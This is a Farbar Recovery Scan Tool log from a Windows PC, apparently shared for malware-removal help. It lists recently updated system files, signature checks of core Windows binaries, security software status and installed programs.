2014-10-14 15:20 - 2014-08-18 22:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 15:20 - 2014-08-18 22:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 15:20 - 2014-08-18 22:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 15:20 - 2014-08-18 22:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 15:20 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 15:20 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 15:20 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 15:20 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00533200 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 15:19 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 15:19 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 15:19 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 15:19 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 15:19 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 15:19 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 15:19 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 15:19 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 15:19 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 15:19 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 15:19 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 15:19 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 15:19 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 15:18 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 15:18 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 15:17 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 15:17 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 15:17 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 15:17 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 15:17 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 15:17 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-07 16:52 - 2014-10-07 16:52 - 00013762 _____ () C:\Users\Ryan\Desktop\contacts.vcf
2014-10-03 22:37 - 2014-10-03 22:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-02 21:39 - 2012-01-02 04:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-02 21:36 - 2013-10-27 14:17 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
2014-11-02 21:34 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\Ryan\Documents\Bluetooth Folder
2014-11-02 21:34 - 2012-06-09 02:40 - 01270449 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 17:36 - 2013-10-27 14:17 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
2014-11-02 15:15 - 2009-07-14 00:13 - 00006214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-01 22:43 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-01 22:43 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-01 22:36 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-01 22:35 - 2012-05-04 13:49 - 00073106 _____ () C:\Windows\setupact.log
2014-11-01 17:05 - 2012-08-10 11:38 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps
2014-11-01 17:00 - 2013-10-16 05:44 - 00000000 ____D () C:\Users\Ryan\Documents\Postcolonial Medicine
2014-10-31 14:58 - 2014-04-12 01:42 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-30 20:49 - 2012-05-18 18:17 - 00263724 _____ () C:\Windows\PFRO.log
2014-10-30 20:43 - 2013-01-18 22:39 - 00708608 ___SH () C:\Users\Ryan\Desktop\Thumbs.db
2014-10-30 06:25 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 15:49 - 2014-04-12 01:42 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-22 16:31 - 2013-10-27 14:17 - 00003872 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA
2014-10-22 16:31 - 2013-10-27 14:17 - 00003476 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core
2014-10-21 10:22 - 2012-08-28 22:49 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Microsoft Help
2014-10-15 18:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 15:38 - 2013-10-25 17:22 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-15 15:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-15 15:27 - 2009-07-13 23:45 - 00342240 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 15:25 - 2014-05-06 23:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 02:01 - 2012-08-28 22:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 01:57 - 2014-05-09 16:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 01:54 - 2014-05-09 16:11 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-13 16:36 - 2012-09-17 11:31 - 00000000 ____D () C:\Users\Ryan\Documents\Personal Statement Docs
2014-10-13 15:01 - 2013-02-09 15:54 - 00000000 ____D () C:\Users\Ryan\Documents\Poems
2014-10-12 22:37 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype
2014-10-03 22:37 - 2014-03-06 03:01 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-03 22:37 - 2012-01-02 03:58 - 00000000 ____D () C:\ProgramData\Skype
Some content of TEMP:
====================
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-10-27 16:31
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Ryan at 2014-11-02 22:23:56
Running from C:\Users\Ryan\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.122 - Atheros)
Atheros WLAN Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 7.0 - Atheros)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cirrus Logic Audio (HKLM-x32\...\{3A69FD31-5EE7-42C9-918B-81C07AA21043}) (Version: 10.14.0.0 - Cirrus Logic)
Cirrus Logic Audio x64 (Version: 7.25.38.0 - Cirrus Logic) Hidden
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin ANT Agent (HKLM\...\{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Talk Plugin (HKLM-x32\...\{95763F66-297E-30CE-9728-6D0F20BF97F5}) (Version: 5.38.5.0 - Google)
GoToMeeting 5.3.0.1009 (HKCU\...\GoToMeeting) (Version: 5.3.0.1009 - CitrixOnline)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36279 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.10.1464 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2752 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
NVIDIA Graphics Driver 296.28 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.28 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
Perfect Photo Suite 7.0.1 (HKLM-x32\...\{6727F16E-6BF0-4E73-AC73-958A382AA09E}) (Version: 7.0.1 - onOne Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.3000 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30130 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.21.00(2/3/2014) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.60.40.03 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SES Driver (HKLM\...\{D8CC254C-C671-4664-9A38-FA368D1E2C97}) (Version: 1.0.0 - Western Digital)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
USB3Setup (HKLM-x32\...\{4814105D-5756-4CD7-9430-ADA474A3E192}) (Version: 1.0.4.220 - VIZIO)
VIZIO Wireless Driver (HKLM-x32\...\{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}) (Version: 1.00.0001 - VIZIO)
VIZIO Wireless Touchpad (HKLM-x32\...\{3F0E78CA-735E-446D-8E60-69C6CA27EC95}) (Version: 1.00.0001 - VIZIO)
VIZIO_FN_Key_Utility (HKLM-x32\...\{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}) (Version: 1.3.15 - VIZIO)
